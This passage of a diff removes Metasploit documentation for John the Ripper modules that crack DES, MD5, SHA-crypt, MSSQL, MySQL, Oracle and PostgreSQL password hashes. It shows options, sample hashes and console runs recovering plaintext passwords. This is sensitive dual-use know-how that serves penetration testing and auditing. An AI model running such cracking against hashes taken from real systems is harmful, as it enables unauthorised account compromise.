-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```
@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```
@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```
@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```
@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```
@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```
@@ -1,158 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
